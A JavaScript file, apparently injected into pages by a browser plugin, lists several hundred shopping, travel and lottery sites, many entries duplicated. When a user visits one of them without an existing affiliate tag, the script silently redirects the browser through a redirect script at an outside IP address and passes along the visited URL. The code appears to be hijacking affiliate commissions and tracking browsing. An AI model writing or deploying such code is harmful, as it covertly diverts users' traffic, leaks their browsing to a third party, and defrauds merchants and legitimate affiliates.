var debug = 0;
if (debug == 1)alert(location.href);

var patt = new Array(
new RegExp("^http://api.cctvmall.com", "g"),
new RegExp("^http://broadcast.tmall.com", "g"),
new RegExp("^http://caipiao.163.com", "g"),
new RegExp("^http://caipiao.wanlitong.com", "g"),
new RegExp("^http://cn.toursforfun.com", "g"),
new RegExp("^http://crz.tmall.com", "g"),
new RegExp("^http://gz.w1365.com", "g"),
new RegExp("^http://home.dangdang.com", "g"),
new RegExp("^http://hot.vdian.com", "g"),
new RegExp("^http://i.emoney.cn", "g"),
new RegExp("^http://lachzp.tmall.com", "g"),
new RegExp("^http://m.500.com", "g"),
new RegExp("^http://mall.goelia.com.cn", "g"),
new RegExp("^http://mmb.cn", "g"),
new RegExp("^http://pba.tmall.com", "g"),
new RegExp("^http://pinstore.cn", "g"),
new RegExp("^http://redbaby.suning.com", "g"),
new RegExp("^http://www.suning.com", "g"),
new RegExp("^http://reg.669.com", "g"),
new RegExp("^http://shop.boqii.com", "g"),
new RegExp("^http://shop.boqii.com", "g"),
new RegExp("^http://shop.doov.com.cn", "g"),
new RegExp("^http://www.100yue.com", "g"),
new RegExp("^http://www.111.com.cn", "g"),
new RegExp("^http://www.21cake.com", "g"),
new RegExp("^http://www.228.com.cn", "g"),
new RegExp("^http://www.asj.com", "g"),
new RegExp("^http://www.258sd.com", "g"),
new RegExp("^http://www.360kad.com", "g"),
new RegExp("^http://www.360kxr.com", "g"),
new RegExp("^http://www.4inlook.cn", "g"),
new RegExp("^http://www.500.com", "g"),
new RegExp("^http://www.51hqt.com", "g"),
new RegExp("^http://www.51you.com", "g"),
new RegExp("^http://www.525j.com", "g"),
new RegExp("^http://www.7lk.cn", "g"),
new RegExp("^http://www.800pharm.com", "g"),
new RegExp("^http://www.818.com", "g"),
new RegExp("^http://www.88.com.cn", "g"),
new RegExp("^http://www.91wutong.com", "g"),
new RegExp("^http://www.99read.com", "g"),
new RegExp("^http://www.aimer.com.cn", "g"),
new RegExp("^http://www.aishezu.com", "g"),
new RegExp("^http://www.aizhigu.com.cn", "g"),
new RegExp("^http://www.anport-e.com", "g"),
new RegExp("^http://www.anta.cn", "g"),
new RegExp("^http://www.aoyou.com", "g"),
new RegExp("^http://www.ashford.com", "g"),
new RegExp("^http://www.asos.cn", "g"),
new RegExp("^http://www.auzzieoutdoors.cn", "g"),
new RegExp("^http://www.banggo.com", "g"),
new RegExp("^http://www.baobeigou.com", "g"),
new RegExp("^http://www.benlai.com", "g"),
new RegExp("^http://www.blemall.com", "g"),
new RegExp("^http://www.bookuu.com", "g"),
new RegExp("^http://www.bubugao.com", "g"),
new RegExp("^http://www.cado.cn", "g"),
new RegExp("^http://www.caicai.cc", "g"),
new RegExp("^http://www.camel.com.cn", "g"),
new RegExp("^http://www.china-pub.com", "g"),
new RegExp("^http://www.chinesean.com", "g"),
new RegExp("^http://www.chunshuitang.com", "g"),
new RegExp("^http://www.cijidoctor.cn", "g"),
new RegExp("^http://www.cp2y.com", "g"),
new RegExp("^http://www.cpbao.com", "g"),
new RegExp("^http://www.d1.com.cn", "g"),
new RegExp("^http://www.dangdang.com", "g"),
new RegExp("^http://www.dapu.com", "g"),
new RegExp("^http://www.dhc.net.cn", "g"),
new RegExp("^http://www.easeeyes.com", "g"),
new RegExp("^http://www.ebay.com", "g"),
new RegExp("^http://www.ehaier.com", "g"),
new RegExp("^http://www.ehmall.com.cn", "g"),
new RegExp("^http://www.e-lining.com", "g"),
new RegExp("^http://www.epetbar.com", "g"),
new RegExp("^http://www.epetbar.com", "g"),
new RegExp("^http://www.epgo.com", "g"),
new RegExp("^http://www.esprit.cn", "g"),
new RegExp("^http://www.fclub.cn", "g"),
new RegExp("^http://www.feifei.com", "g"),
new RegExp("^http://www.feiniu.com", "g"),
new RegExp("^http://www.feiniu.com", "g"),
new RegExp("^http://www.frbao.com", "g"),
new RegExp("^http://www.futongdai.com", "g"),
new RegExp("^http://www.germanto.cn.com", "g"),
new RegExp("^http://www.ghcai.com", "g"),
new RegExp("^http://www.gome.com.cn", "g"),
new RegExp("^http://www.guiyoudq.com", "g"),
new RegExp("^http://www.guuoo.com", "g"),
new RegExp("^http://www.haitaocheng.com", "g"),
new RegExp("^http://www.haitaocheng.com", "g"),
new RegExp("^http://www.haituncun.com", "g"),
new RegExp("^http://www.handu.com", "g"),
new RegExp("^http://www.hao24.cn", "g"),
new RegExp("^http://www.haohaizi.com", "g"),
new RegExp("^http://www.happigo.com", "g"),
new RegExp("^http://www.hitao.com", "g"),
new RegExp("^http://www.hitao.com", "g"),
new RegExp("^http://www.hitour.cc", "g"),
new RegExp("^http://www.homevv.com", "g"),
new RegExp("^http://www.homevv.com", "g"),
new RegExp("^http://www.hxepawn.com", "g"),
new RegExp("^http://www.hxshop.com", "g"),
new RegExp("^http://www.ibuying.com", "g"),
new RegExp("^http://www.ihaveu.com", "g"),
new RegExp("^http://www.ikjtao.com", "g"),
new RegExp("^http://www.imopark.com", "g"),
new RegExp("^http://www.iwugu.com", "g"),
new RegExp("^http://www.j1.com", "g"),
new RegExp("^http://www.jd.com", "g"),
new RegExp("^http://www.jinjianginns.com", "g"),
new RegExp("^http://www.jiuxian.com", "g"),
new RegExp("^http://www.jiuxindai.com", "g"),
new RegExp("^http://www.jufengshang.com", "g"),
new RegExp("^http://www.jxdyf.com", "g"),
new RegExp("^http://www.jxmall.com", "g"),
new RegExp("^http://www.kadang.com", "g"),
new RegExp("^http://www.k.cn", "g"),
new RegExp("^http://www.koolearn.com", "g"),
new RegExp("^http://www.kuaishubao.com", "g"),
new RegExp("^http://www.kumanju.cn", "g"),
new RegExp("^http://www.kuxun.com", "g"),
new RegExp("^http://www.kyp.com", "g"),
new RegExp("^http://www.kzj365.com", "g"),
new RegExp("^http://www.lamiu.com", "g"),
new RegExp("^http://www.lashou.com", "g"),
new RegExp("^http://www.lbxcn.com", "g"),
new RegExp("^http://www.lecake.com", "g"),
new RegExp("^http://www.lefeng.com", "g"),
new RegExp("^http://www.lefeng.com", "g"),
new RegExp("^http://www.lhmart.com", "g"),
new RegExp("^http://www.liebo.com", "g"),
new RegExp("^http://www.lifevc.com", "g"),
new RegExp("^http://www.lingshi.com", "g"),
new RegExp("^http://www.lizi.com", "g"),
new RegExp("^http://www.lovo.cn", "g"),
new RegExp("^http://www.lulutrip.com", "g"),
new RegExp("^http://www.lvmama.com", "g"),
new RegExp("^http://www.ly.com", "g"),
new RegExp("^http://www.m18.com", "g"),
new RegExp("^http://www.m18.com", "g"),
new RegExp("^http://www.m6go.com", "g"),
new RegExp("^http://www.maichawang.com", "g"),
new RegExp("^http://www.maici.com", "g"),
new RegExp("^http://www.maizuo.com", "g"),
new RegExp("^http://www.mangocity.com", "g"),
new RegExp("^http://www.masamaso.com", "g"),
new RegExp("^http://www.mbaobao.com", "g"),
new RegExp("^http://www.mcake.com", "g"),
new RegExp("^http://www.meici.com", "g"),
new RegExp("^http://www.mei.com", "g"),
new RegExp("^http://www.meihui.co", "g"),
new RegExp("^http://www.meituan.com", "g"),
new RegExp("^http://www.menglu.com", "g"),
new RegExp("^http://www.mf910.com", "g"),
new RegExp("^http://www.miyabaobei.com", "g"),
new RegExp("^http://www.mmall.com", "g"),
new RegExp("^http://www.mogujie.com", "g"),
new RegExp("^http://www.moonbasa.com", "g"),
new RegExp("^http://www.muji.com.cn", "g"),
new RegExp("^http://www.muyingzhijia.com", "g"),
new RegExp("^http://www.naruko.com.cn", "g"),
new RegExp("^http://www.newegg.cn", "g"),
new RegExp("^http://www.no5.com.cn", "g"),
new RegExp("^http://www.nuomi.com", "g"),
new RegExp("^http://www.ocj.com.cn", "g"),
new RegExp("^http://www.officedepot.com.cn", "g"),
new RegExp("^http://www.oigo.cn", "g"),
new RegExp("^http://www.okhqb.com", "g"),
new RegExp("^http://www.paipai.com", "g"),
new RegExp("^http://www.ppdai.com", "g"),
new RegExp("^http://www.paixie.net", "g"),
new RegExp("^http://www.pb89.com", "g"),
new RegExp("^http://www.podinns.com", "g"),
new RegExp("^http://www.purcotton.com", "g"),
new RegExp("^http://www.pztuan.com", "g"),
new RegExp("^http://www.qinqin.com", "g"),
new RegExp("^http://www.qmango.com", "g"),
new RegExp("^http://www.qqgshop.com", "g"),
new RegExp("^http://www.quwan.com", "g"),
new RegExp("^http://www.rax.cn", "g"),
new RegExp("^http://www.meilishuo.com", "g"),
new RegExp("^http://www.s.cn", "g"),
new RegExp("^http://www.secoo.com", "g"),
new RegExp("^http://www.sephora.cn", "g"),
new RegExp("^http://www.sfbest.com", "g"),
new RegExp("^http://www.shanshan360.com", "g"),
new RegExp("^http://www.shopin.net", "g"),
new RegExp("^http://www.skg.com", "g"),
new RegExp("^http://www.springtour.com", "g"),
new RegExp("^http://www.staples.cn", "g"),
new RegExp("^http://www.taoxie.com", "g"),
new RegExp("^http://www.touna.cn", "g"),
new RegExp("^http://www.ttcj.tv", "g"),
new RegExp("^http://www.ttcj.tv", "g"),
new RegExp("^http://www.tujia.com", "g"),
new RegExp("^http://www.uiyi.cn", "g"),
new RegExp("^http://www.ujipin.com", "g"),
new RegExp("^http://www.ujipin.com", "g"),
new RegExp("^http://www.ule.com", "g"),
new RegExp("^http://www.ule.com", "g"),
new RegExp("^http://www.uneed.cn", "g"),
new RegExp("^http://www.usashopcn.com", "g"),
new RegExp("^http://www.v1pin.com", "g"),
new RegExp("^http://www.vip.com", "g"),
new RegExp("^http://www.vmall.com", "g"),
new RegExp("^http://www.vsigo.cn", "g"),
new RegExp("^http://www.wangfujing.com", "g"),
new RegExp("^http://www.wangfujing.com", "g"),
new RegExp("^http://www.wangjiu.com", "g"),
new RegExp("^http://www.wbiao.cn", "g"),
new RegExp("^http://www.wine9.com", "g"),
new RegExp("^http://www.wm18.com", "g"),
new RegExp("^http://www.womai.com", "g"),
new RegExp("^http://www.wyn88.com", "g"),
new RegExp("^http://www.x.com.cn", "g"),
new RegExp("^http://www.xiangguo.tv", "g"),
new RegExp("^http://www.xiu.com", "g"),
new RegExp("^http://www.xjh.com", "g"),
new RegExp("^http://www.xqzh1.com", "g"),
new RegExp("^http://www.xtep.com.cn", "g"),
new RegExp("^http://www.xzhuang.com", "g"),
new RegExp("^http://www.yaofang.cn", "g"),
new RegExp("^http://www.yasgo.com.cn", "g"),
new RegExp("^http://www.okhqb.com", "g"),
new RegExp("^http://www.paipai.com", "g"),
new RegExp("^http://www.ppdai.com", "g"),
new RegExp("^http://www.paixie.net", "g"),
new RegExp("^http://www.pb89.com", "g"),
new RegExp("^http://www.podinns.com", "g"),
new RegExp("^http://www.purcotton.com", "g"),
new RegExp("^http://www.pztuan.com", "g"),
new RegExp("^http://www.qinqin.com", "g"),
new RegExp("^http://www.qmango.com", "g"),
new RegExp("^http://www.qqgshop.com", "g"),
new RegExp("^http://www.quwan.com", "g"),
new RegExp("^http://www.rax.cn", "g"),
new RegExp("^http://www.meilishuo.com", "g"),
new RegExp("^http://www.s.cn", "g"),
new RegExp("^http://www.secoo.com", "g"),
new RegExp("^http://www.sephora.cn", "g"),
new RegExp("^http://www.sfbest.com", "g"),
new RegExp("^http://www.shanshan360.com", "g"),
new RegExp("^http://www.shopin.net", "g"),
new RegExp("^http://www.skg.com", "g"),
new RegExp("^http://www.springtour.com", "g"),
new RegExp("^http://www.staples.cn", "g"),
new RegExp("^http://www.taoxie.com", "g"),
new RegExp("^http://www.touna.cn", "g"),
new RegExp("^http://www.ttcj.tv", "g"),
new RegExp("^http://www.ttcj.tv", "g"),
new RegExp("^http://www.tujia.com", "g"),
new RegExp("^http://www.uiyi.cn", "g"),
new RegExp("^http://www.ujipin.com", "g"),
new RegExp("^http://www.ujipin.com", "g"),
new RegExp("^http://www.ule.com", "g"),
new RegExp("^http://www.ule.com", "g"),
new RegExp("^http://www.uneed.cn", "g"),
new RegExp("^http://www.usashopcn.com", "g"),
new RegExp("^http://www.v1pin.com", "g"),
new RegExp("^http://www.vip.com", "g"),
new RegExp("^http://www.vmall.com", "g"),
new RegExp("^http://www.vsigo.cn", "g"),
new RegExp("^http://www.wangfujing.com", "g"),
new RegExp("^http://www.wangfujing.com", "g"),
new RegExp("^http://www.wangjiu.com", "g"),
new RegExp("^http://www.wbiao.cn", "g"),
new RegExp("^http://www.wine9.com", "g"),
new RegExp("^http://www.wm18.com", "g"),
new RegExp("^http://www.womai.com", "g"),
new RegExp("^http://www.wyn88.com", "g"),
new RegExp("^http://www.x.com.cn", "g"),
new RegExp("^http://www.xiangguo.tv", "g"),
new RegExp("^http://www.xiu.com", "g"),
new RegExp("^http://www.xjh.com", "g"),
new RegExp("^http://www.xqzh1.com", "g"),
new RegExp("^http://www.xtep.com.cn", "g"),
new RegExp("^http://www.xzhuang.com", "g"),
new RegExp("^http://www.yaofang.cn", "g"),
new RegExp("^http://www.yasgo.com.cn", "g"),
new RegExp("^http://www.yhd.com", "g"),
new RegExp("^http://www.yichao.cn", "g"),
new RegExp("^http://www.yichengpin.com", "g"),
new RegExp("^http://www.yiguo.com", "g"),
new RegExp("^http://www.yintai.com", "g"),
new RegExp("^http://www.yintai.com", "g"),
new RegExp("^http://www.yinzuo100.com", "g"),
new RegExp("^http://www.yixun.com", "g"),
new RegExp("^http://www.ymatou.com", "g"),
new RegExp("^http://www.ymatou.com", "g"),
new RegExp("^http://www.yododo.com", "g"),
new RegExp("^http://www.yofus.com", "g"),
new RegExp("^http://www.yohobuy.com", "g"),
new RegExp("^http://www.youayou.com", "g"),
new RegExp("^http://www.youmi.cn", "g"),
new RegExp("^http://www.yves-rocher.cn", "g"),
new RegExp("^http://www.yylvtu.com", "g"),
new RegExp("^http://www.zbird.com", "g"),
new RegExp("^http://www.zhenpin.com", "g"),
new RegExp("^http://www.zhiwo.com", "g"),
new RegExp("^http://www.zhongjiu.cn", "g"),
new RegExp("^http://www.zhubajie.com", "g"),
new RegExp("^http://www.zhuna.cn", "g"),
new RegExp("^http://www.zigeer.com", "g"),
new RegExp("^http://www.zzt.tm", "g")
);

var antipatt = new Array(
new RegExp("[^0-9]762178[^0-9]*", "g"),
new RegExp("http://click.linktech.cn/.*a=A100204038", "g"),
new RegExp("http://union.500.com/", "g"),
new RegExp("http://p.yiqifa.com/", "g"),
new RegExp("http://120.25.239.154/","g"),
new RegExp("http://www.hello987.com/","g")
);


function getUID()
{
  var x=document.getElementById("entropyplugin");
  return  x.name;
}

function do_redirect(url, referrer)
{
    for	(index = 0; index < patt.length; index++) {
	
	    if (referrer.match(patt[index]))continue;
		
	    if(url.match(patt[index])){
		    var anti = 0;
		    for(i = 0;i<antipatt.length; i++){
			    if (referrer.match(antipatt[i]) || url.match(antipatt[i])){
				    anti = 1;
					break;
				}
			}
			if (anti == 0) return true;
		}
	}
    return false;
}

if (do_redirect(location.href.trim(), document.referrer.trim())){
    if (debug == 1)alert("DO redirect:   " + document.referrer);
	location.href="http://120.25.239.154/redirect.php?to=" + encodeURIComponent(location.href);
}
